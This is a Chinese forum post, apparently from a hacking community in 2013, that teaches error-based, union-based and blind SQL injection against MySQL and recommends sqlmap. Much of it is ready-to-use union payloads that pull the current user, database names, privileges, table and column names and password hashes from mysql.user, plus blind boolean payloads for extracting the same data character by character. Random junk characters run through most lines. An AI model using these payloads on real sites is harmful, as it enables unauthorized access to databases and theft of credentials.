放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。$ \7 ~4 e( a( l* W7 x
- v$ _0 {/ C3 C, q3 T. U- Y/ ~
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
8 z. z+ t- O" k: L/ h5 u: f" m
7 n- K# Y4 r! l分类标准 分类 备注
$ m& W8 H: s; e: j+ b# z按字段类型 整型注入,字符型注入
9 e, a' E4 R& E* s: W* q按出现的位置 get注入,post注入,cookie注入,http header注入 & K- L% n1 k# P4 o" Y8 ?6 p. e
然而高级注入是这样的
) {7 t$ X% i8 b! i0 h. Z' M- Z
3 n' |6 l& }) ]$ Z4 l高级注入分类 条件
' t- j& C) Q' f6 Ierror-based sql 数据库的错误回显可以返回,存在数据库,表结构
2 H( t" w3 n9 \3 {7 t" eunion-based sql 能够使用union,存在数据库,表结构$ i: b9 _( K# f9 d! ]8 I
blind sql 存在注入
1 M- I) k8 f8 P( f1 m; f9 v我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。( ?- C% r& ~" H: _
& q. q x' y! B; k. `+ N好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
- [/ X! e- ?8 g p" U1 A; Q6 H! X 2 J M- ]6 t& T% K" j) D
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。6 J8 ^0 C' W: G' |/ X/ q- B k
0 t2 Q' Z6 T& V3 e- c
这里用mysql说明
6 o" Y; A, X4 ? , _9 c( Y: U" I5 }! K1 h6 a
e注入坛子里很多了,请看戳我或者再戳我
0 a2 x) M$ o2 k i( z
( q7 j/ S) \' {: K& S' B _) }u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
% U, U9 m3 x: G
( y) l2 ` j6 s' O& S获取当前数据库用户名/ x! o4 Z# t0 a) A9 b4 J0 ]
0 ]1 v$ U% f% [# j7 W& Z
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
7 V2 {8 g# g* k. e9 CAST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL# v+ Z$ i! d: @0 h& Z: X
L, NULL#
1 R4 V9 L' M* ]注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
9 `. \7 Z l" s" c& s
+ c& a8 d( a% A获取数据库名
" R. b: t, H9 H8 ? 2 c+ X. f& o: [0 G: p: u
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
- {3 f0 G$ j" {: V% l, [6 u* L2 X获取所有用户名0 p3 p. A& Z) u' i- p
2 ?. D+ q8 L4 Z; @( O
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
; o* z# M+ H/ w5 ^查看当前用户权限% {& i" R4 L! |+ V# P# H
& q. L2 K2 l W: Q o% m
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
3 \7 H$ K g0 ^5 z3 w/ A3 q2 v尝试获取密码,当然需要有能读mysql数据库的权限1 P5 X( E7 d6 A
! i$ }) u! u5 F0 @UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
! J) u5 z, Q# ~2 ~2 K- ]$ s9 P, H% y获取表名,limit什么的自己搞啦
6 ]- M2 J! ~' E( Z& N: V
2 f: o' v; Q1 d1 L* ]' W! P' NUNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
: ~% y' |0 e1 m& g6 m D2 o获取字段名及其类型8 k# F; i L" n" `1 T5 D
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#3 K6 l2 _% m: P, z1 Y8 \4 P
$ \6 g- J) @6 ?* Jb注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
/ `+ u& m8 t" I6 k2 u0 d ; q `6 c6 a( F" }
如:+ [+ W2 g5 t( z
获取当前用户名
, d8 E4 ^7 {7 M1 a/ U3 v& C/ T 8 U/ |- S& q1 J9 z# y
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
, `" c0 d% w) s1 k: S9 Z+ o获取当前数据库
9 `% U& H+ w2 w- i* V5 r C9 z ' x- r D. w, \# Z( L
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 1060 l! H, o" [3 W( s& m# ]- ]" G& c
获取表名" \- J& L7 T' o/ r d, ~( Y
( d. _9 o5 O' D. `. N" xAND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51: _6 a1 w$ c5 {" A
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
% d+ G4 F0 o- S& H$ q回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
; C0 i" z& ?# i爆表
" _4 @! b1 L6 ]: j& b4 \9 ` 7 g0 K: I' J% J9 B l6 d; q8 i$ @% K
AND EXISTS(select * from table)& W: Q! B8 ~9 F k5 {1 M5 V; N
爆字段/ C' F8 u. @8 }/ Q) p$ y
& Z8 V/ m8 u# V/ m( N5 d7 b2 ^- jAND EXISTS(select pwd from table). X2 B( O; i: z$ [1 C
盲注的变化就比较多了,由于篇幅,只是举个例子而已。1 g4 Q; H0 [% I6 ]6 o
$ a5 [/ ]8 E+ a1 z" T
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。: ^3 c5 l, Q+ B! ?7 N+ E/ x, D
|
发表于 2013-7-16 20:31:26
收藏
支持
反对